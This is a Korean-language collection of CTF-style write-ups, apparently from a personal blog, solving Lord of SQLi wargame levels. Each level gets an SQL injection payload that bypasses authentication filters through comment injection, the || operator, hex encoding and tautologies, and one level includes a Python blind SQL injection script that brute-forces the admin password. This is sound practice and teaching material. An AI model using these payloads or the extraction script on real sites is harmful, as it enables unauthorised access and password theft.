문제를 보면 쿼리 맨 뒤 부분에 and 1=0 이라는 구문이 있어 쿼리가 거짓이 되고 있다. 이 부분을 주석처리를 통해 없애주면 문제를 해결할 수 있을 것 같다. /?pw=' or id='admin'# 이라는 쿼리를 보냈더니 #문자가 들어가지 않아서 #을 헥스값으로 바꾼 %23으로 넣었더니 정상적으로 주석처리가 되며 쿼리가 참이 되서 문제를 해결할 수 있었다.
payload : /?pw=' or id='admin'%23
| [Hack CTF] x64 Simple_size_BOF (0) | 2021.04.25 |
|---|---|
| [Hack CTF] x64 Buffer Overflow (0) | 2021.04.23 |
| [LoS] vampire (0) | 2020.11.10 |
| [LoS] troll (0) | 2020.11.06 |
| [LoS] orge (0) | 2020.11.06 |
문제를 보면 id 값이 admin 이여야 하고 preg_match() 함수를 통해 or과 and 가 필터링 되어 있다. 이 문자열들은 sql에서 ||(or) 연산자와 &&(연산자)도 같은 역활을 한다. 따라서 || 연산자를 활용하여 or 필터링을 우회할 수 있다.
/?pw='||id=admin 으로 쿼리를 주입하면 문제를 해결할 수 있다.
| [LoS] troll (0) | 2020.11.06 |
|---|---|
| [LoS] orge (0) | 2020.11.06 |
| [LoS] goblin (0) | 2020.11.03 |
| [LoS] orc (0) | 2019.11.29 |
| [LoS] cobolt (0) | 2019.11.26 |
문제를 보면 id 값이 admin이면 문제가 풀리고, 현재 id 값은 guest 이다. preg_match()함수를 통해 싱글쿼터(')와 더블쿼터(")는 모두 필터링 되어 있다.
no 값에 1을 넣어 보면 hello guest가 출력되는 것을 보니 guest의 no 값은 1이다.
싱글 쿼터가 필터링 된 것은 hex값을 이용하여 우회할 수 있다. id 값이 admin이여야 하므로 admin의 hex 값은 0x61646d696e 이다.
쿼리를 /?no=2 or id=0x61646d696e 로 전송하게 되면 앞에 no 값이 거짓이기 때문에 id값은 admin이 되어 문제를 해결할 수 있다.
| [LoS] orge (0) | 2020.11.06 |
|---|---|
| [LoS] darkelf (0) | 2020.11.03 |
| [LoS] orc (0) | 2019.11.29 |
| [LoS] cobolt (0) | 2019.11.26 |
| [LoS] gremlin (0) | 2019.11.26 |
문제를 보면 pw 값이 admin의 pw값과 일치하면 문제를 풀 수 있는 것 같다.
blind sql injection 을 통해 pw를 알아낼 수 있을 것 같다.
pw 알아내는 과정을 두 단계로 설명해 보면 먼저 pw의 길이를 알아내고 알아낸 길이로 실제 pw 값을 알아낼 수 있다.
pw의 길이를 알아내는 방법은 length() 함수를 통해 알아낼 수 있고, pw 값은 substr() 함수를 통해 알아낼 수 있다.
length()는 문자열 길이를 반환하는 함수이고, substr()함수는 문자열을 특정 범위만큼 자르는 함수이다.
위 페이지에서는 쿼리의 조건이 참이면 "Hello admin"을 출력한다.
length() 함수를 이용하여 pw의 길이를 1부터 확인해 본 결과 pw의 길이는 8이였다.
query: ?pw=' or length(pw)=8--%20
pw의 값은 substr 함수로 1자리씩 참,거짓을 판단하여 구할 수 있다.
이 과정을 사람이 수행하기에는 경우의 수가 너무 많기 때문에 파이썬으로 자동화 코드를 짜서 실행하였다.
import requests
import re
cookies = {"PHPSESSID": "38mrr1emu522is42ls4dq00svn"}
pwLen = 0
url = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php"
tryList = []
result = ""
for i in range(0,10):
tryList.append(i)
for i in range(97, 123): # 아스키 코드 값(영문 소문자)
tryList.append(chr(i))
for i in range(1,100):
lenPayload = "?pw=1' or length(pw)='" +str(i)
new_url = url + lenPayload
req = requests.get(new_url,cookies=cookies)
if re.findall("<h2>Hello admin</h2>", req.text): # pw 길이를 찾으면 길이를 저장하고 반복문 종료
pwLen = i
break
print("pw len : " +str(pwLen))
for i in range(1,pwLen+1): # pw 길이 만큼 반복
for w in range(0,len(tryList)+1): # 0~9 숫자 + 영소문자 갯수 만큼 반복
par = "?pw=1' or substr(pw," +str(i) +",1)='" +str(tryList[w]) # pw 값을 1번째 자리부터 숫자, 영소문자를 대입하여 비교
new_url = url + par
req = requests.get(new_url,cookies=cookies)
if re.findall("<h2>Hello admin</h2>", req.text): # 결과가 참이면 해당 값을 저장하고 다음 자리로 넘어감
print(tryList[w])
result += str(tryList[w])
break
print("password is " +result)
위 코드를 수행하면 다음과 같은 결과값이 나오고, pw를 문제 페이지에 입력하면 문제가 해결된다.
| [LoS] darkelf (0) | 2020.11.03 |
|---|---|
| [LoS] goblin (0) | 2020.11.03 |
| [LoS] cobolt (0) | 2019.11.26 |
| [LoS] gremlin (0) | 2019.11.26 |
| [Wargame.kr] type confusion (0) | 2019.09.10 |
문제 코드를 보면 전 문제와 마찬가지로 preg_match() 함수를 이용하여 특정 문자열들을 필터링하고 있고
id가 admin일때 문제가 풀린다고 한다.
id에 admin 값을 넣고 pw를 검증하는 부분을 주석으로 없애면 문제를 해결할 수 있다.
#을 url 인코딩한 %23을 주석으로 사용할 수 있다.
query : ?id=admin'%23
| [LoS] goblin (0) | 2020.11.03 |
|---|---|
| [LoS] orc (0) | 2019.11.29 |
| [LoS] gremlin (0) | 2019.11.26 |
| [Wargame.kr] type confusion (0) | 2019.09.10 |
| [Wargame.kr] tmitter (0) | 2019.09.07 |
문제 코드를 보면 id 값이 있으면 문제가 풀린다.
또한 preg_match() 함수를 이용하여 _ , . 등의 문자등을 필터링 하고 있다.
필터링 하는 문자열에는 '(싱글쿼터)와 #(주석), or 등이 없다.
따라서 id 값에 or 연산으로 조건을 참으로 만들어 주면 문제가 해결된다.
query : ?id=admin' or '1'='1#
| [LoS] orc (0) | 2019.11.29 |
|---|---|
| [LoS] cobolt (0) | 2019.11.26 |
| [Wargame.kr] type confusion (0) | 2019.09.10 |
| [Wargame.kr] tmitter (0) | 2019.09.07 |
| [Wargame.kr] md5_compare (0) | 2019.09.03 |